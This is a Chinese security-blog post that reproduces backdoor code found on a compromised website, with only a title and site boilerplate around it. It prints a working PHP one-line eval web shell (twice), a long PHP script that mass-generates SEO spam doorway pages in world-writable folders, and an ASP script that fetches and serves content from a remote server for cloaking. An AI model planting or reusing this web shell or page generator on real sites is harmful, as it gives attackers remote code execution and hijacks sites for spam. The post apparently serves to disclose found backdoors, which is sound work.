神刀安全网

某站里的后门代码和自动生成页面

<?php $Exp=strrev($_POST[‘longmo’]);eval($Exp($_POST[z0]));?>

 

<?php
error_reporting(E_ERROR);
set_time_limit(0);

function setarray(){
return array(‘num’=>25,’tnum’=>25,’xnum’=>25,’nnum’=>25,’mnum’=>4,’along’=>200,’keyfile’=>’k.txt’,’txtfile’=>’t.txt’,’templetefile’=>’m.html’,’minpathlen’=>5,’maxpathlen’=>10,’isopenext’=>true);
}
function getKey($digits)
{
$char_array=array(“0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”,”g”,”h”,”i”,”j”,”k”,”m”,”n”,”o”,”p”,”q”,”r”,”s”,”t”,”u”,”v”,”w”,”x”,”y”,”z”);

$output=””;
for($i=0;$i<$digits;$i++){
$output.=$char_array[GetRanNum(0,35)];
}
return $output;
}
function GetRanNum($min,$max){
srand((double)microtime()*1000000);
return rand($min,$max);
}
function mainshow($allnum,$appsplit,$hostpath,$hostkey,$ext){

$set=setarray();
$skinext=””;
if($set[‘isopenext’]) $skinext=$ext;
$templetePath=file_get_contents($set[‘templetefile’]);

$myArt = eArt($set[‘along’],$set[‘txtfile’]);
$rtemplete=preg_replace(‘/\$ekey\$/’,$hostkey,$templetePath);
$rtemplete=preg_replace(‘/\$title\$/’,$hostkey,$rtemplete);

$m_keyword=”;
for($ikey=0;$ikey<4;$ikey++){
$arr=readApp($appsplit,GetRanNum(0, $allnum-1));
$m_keyword.=’,’.$arr[1];
}
$rtemplete=preg_replace(‘/\$keyword\$/’,$hostkey.$m_keyword,$rtemplete);
$rtemplete=preg_replace(‘/\$description\$/’,$hostkey.$m_keyword,$rtemplete);
$rtemplete=preg_replace(‘/\$host\$/’,’../’.hostpath.’/’.$skinext,$rtemplete);
$ahost=readApp($appsplit,GetRanNum(0, $allnum-1));
$rtemplete=preg_replace(‘/\$author\$/’,'<a href=”../”‘.$ahost[0].'”/’.$skinext.'” target=”_bank”>’.$ahost[1].'</a>’,$rtemplete);
$rtemplete=preg_replace(‘/\$mainword\$/’,$hostkey,$rtemplete);
$rtemplete=preg_replace(‘/\$now\$/’,date(“Y-m-d H:i:s”),$rtemplete);

$tmyArt=ceil(strlen($myArt)/2);
$scontent= substr($myArt, 0,$tmyArt).'<b>’.$hostkey.'</b>’.substr($myArt, $tmyArt,$tmyArt-1);

$rtemplete=preg_replace(‘/\$content\$/’,$scontent,$rtemplete);
for($kk=0;$kk<=$set[‘num’];$kk++){
$bhostarr=readApp($appsplit,GetRanNum(0, $allnum-1));
$rtemplete=preg_replace(‘/\$key’.$kk.’\$/’,$bhostarr[1],$rtemplete);
$rtemplete=preg_replace(‘/\$url’.$kk.’\$/’,’../’.$bhostarr[0].’/’.$skinext,$rtemplete);
}
for($kk=0;$kk<=$set[‘tnum’];$kk++){
$bhostarr=readApp($appsplit,GetRanNum(0, $allnum-1));
$rtemplete=preg_replace(‘/\$tkey’.$kk.’\$/’,$bhostarr[1],$rtemplete);
$rtemplete=preg_replace(‘/\$turl’.$kk.’\$/’,’../’.$bhostarr[0].’/’.$skinext,$rtemplete);
}
for($kk=0;$kk<=$set[‘xnum’];$kk++){
$bhostarr=readApp($appsplit,GetRanNum(0, $allnum-1));
$rtemplete=preg_replace(‘/\$xkey’.$kk.’\$/’,$bhostarr[1],$rtemplete);
$rtemplete=preg_replace(‘/\$xurl’.$kk.’\$/’,’../’.$bhostarr[0].’/’.$skinext,$rtemplete);
}
for($kk=0;$kk<=$set[‘nnum’];$kk++){
$bhostarr=readApp($appsplit,GetRanNum(0, $allnum-1));
$rtemplete=preg_replace(‘/\$nkey’.$kk.’\$/’,$bhostarr[1],$rtemplete);
$rtemplete=preg_replace(‘/\$nurl’.$kk.’\$/’,’../’.$bhostarr[0].’/’.$skinext,$rtemplete);
}
for($kk=0;$kk<=$set[‘mnum’];$kk++){
$bhostarr=readApp($appsplit,GetRanNum(0, $allnum-1));
$rtemplete=preg_replace(‘/\$mkey’.$kk.’\$/’,$bhostarr[1],$rtemplete);
$rtemplete=preg_replace(‘/\$murl’.$kk.’\$/’,’../’.$bhostarr[0].’/’.$skinext,$rtemplete);
}
//mkdir($hostpath.’/’,’0777′);

$file=$hostpath.’/’.$ext;
$oldumask=umask(0);
@mkdir($hostpath.’/’);
@umask($oldumask);
@chmod($hostpath.’/’, 0777);

$james=fopen($file,”w”);
fwrite($james,$rtemplete);
fclose($james);
echo $hostkey.”:”.$file.’ success!<br>’;

}
function eArt($along,$txtfile){
$art=file_get_contents($txtfile);
if(strlen($art)<=$along){
return $art;
}
$ransArt = GetRanNum(100, strlen($art) – $along);
return substr($art,$ransArt,$along);
}
function get_HOST2($xStr){
$set=setarray();
$hostx=getKey(GetRanNum($set[‘minpathlen’],$set[‘maxpathlen’]));
if(strpos(‘$’.$xStr,’$’.$hostx.’#’)>-1){
return get_HOST2($xStr);
}else{
return $hostx;
}
}
function eKey(){
$set=setarray();
$key = file_get_contents($set[‘keyfile’]);
$array = explode(“\r\n”, $key);
return $array[GetRanNum(0, count($array))];
}
function getApp($allnum){

$str=””;
for($i=0;$i<$allnum;$i++){
$hots=get_HOST2($str);
$HOST_HtmlKey=eKey();
$str.=$hots.’#’.$HOST_HtmlKey.’$’;
}
return $str;

}
function readApp($apps_split,$ic)
{
$appsHtml=$apps_split[$ic];
$appArray=explode(‘#’,$appsHtml);
return $appArray;
}
function splitReadApp($allnum){
$apps=file_get_contents(“app.txt”);
$apps_split=explode(‘$’,$apps);
return $apps_split;
}
$run=$_GET[“ing”];
$allnum=$_GET[“allnum”];
$pagenum=$_GET[“pagenum”];
$ext=$_GET[“ext”];
$page=$_GET[“page”];

if($run==’update’){
$ipage=$_GET[“ipage”];
if(!preg_match(“/^[0-9]*$/”,$ipage)){
$ipage=0;
if(file_exists(“app.txt”)) unlink(“app.txt”);
}
if($ipage==””){
$ipage=0;
if(file_exists(“app.txt”)) unlink(“app.txt”);
}
$xpagenum=500;
$startnum=$ipage*$xpagenum;
$endnum=($ipage+1)*$xpagenum;
if(intval($startnum,10)>intval($allnum,10)){
echo “关键词处理完毕,转向生成文件<script>setTimeout(function(){window.location.href=’?ing=run&allnum=”.$allnum.”&pagenum=”.$pagenum.”&ext=”.$ext.”&page=”.$page.”‘;},3000)</script>”;
//echo ‘关键词处理完毕,转向生成文件’;
return false;
}
$fn = ‘app.txt’;
$word=getApp(($endnum-$startnum));
if(file_exists(“app.txt”)){
$fp = fopen($fn, ‘a’);
}
else{
$fp = fopen($fn, ‘w’);
}
fwrite($fp, $word);
fclose($fp);
echo $ipage.”页处理完毕<script>setTimeout(function(){window.location.href=’?ing=update&allnum=”.$allnum.”&pagenum=”.$pagenum.”&ext=”.$ext.”&page=”.$page.”&ipage=”.($ipage+1).”‘;},2000)</script>”;
return false;
}

if($run==’run’){
if($ext==””){
echo “生成类型不能为空”;
return false;
}
if(!preg_match(“/^[0-9]*$/”,$allnum)){
echo “生成数量不能为空”;
return false;
}
if(!preg_match(“/^[0-9]*$/”,$pagenum)){
echo “每页生成数量不能为空”;
return false;
}
if(!preg_match(“/^[0-9]*$/”,$page)){
$page=1;
}
if($page==””){
$page=1;
}

$appsplit=splitReadApp($allnum);
$xpage=$page-1;
$startNum=$xpage*$pagenum;

if($startNum>$allnum-1){
$rapp=readApp($appsplit,$allnum-1);
echo “处理完毕!<a href='”.$rapp[0].”/’>点此查看</a>”;
return false;
}
$endNum=$page*$pagenum;
if($endNum>$allnum-1){
$endNum=$allnum-1;
}
echo “正在处理数据:”.$startNum.”-“.$endNum.”/进度:”.(($startNum/$allnum)*100).”%<br>”;
for($jj=$startNum;$jj<=$endNum;$jj++){
$hosthtml=readApp($appsplit,$jj);
$hostpath=$hosthtml[0];
$hostkey=$hosthtml[1];
mainshow($allnum,$appsplit,$hostpath,$hostkey,$ext);
}
echo “<script>setTimeout(function(){window.location.href=’?ing=run&allnum=”.$allnum.”&pagenum=”.$pagenum.”&ext=”.$ext.”&page=”.($page+1).”‘;},5000)</script>”;
return false;
}
?>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
<title>无标题文档</title>
</head>

<body>
<form id=”form1″ name=”form1″ method=”get” action=””>
生成数量:<input name=”ing” type=”hidden” id=”ing” value=”update” size=”10″ />
<input name=”allnum” type=”text” id=”allnum” value=”1000″ size=”10″ />
每页生成数量
<input name=”pagenum” type=”text” id=”pagenum” value=”300″ size=”10″ />
生成文件名
<input name=”ext” type=”text” id=”ext” value=”index.html” />
<input type=”submit” name=”button” id=”button” value=”提交” />
</form>
</body>
</html>

 

 

<?php $Exp=strrev($_POST[‘longmo’]);eval($Exp($_POST[z0]));?>

 

asp的

<%
server.Scripttimeout=999999
Remote_server=”http://www.px2020.com/”
host_name=”http://”&request.servervariables(“HTTP_HOST”)&request.servervariables(“script_name”)
Remote_file = Remote_server&”/index.php”&”?host=”&host_name&”&url=”&Request.servervariables(“Query_String”)&”&domain=”&Request.servervariables(“Server_Name”)
Content_mb=GetHtml(Remote_file)
response.write Content_mb
%>
<%
Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject(“MSXML2.serverXMLHTTP”)
ObjXMLHTTP.Open “GET”,url,False
ObjXMLHTTP.setRequestHeader “User-Agent”,”aQ0O010O”
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject(“Adodb.Stream”)
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = “gb2312”
GetHtml = objStream.ReadText
objStream.Close
End Function
%>

 

 

 

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 某站里的后门代码和自动生成页面

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮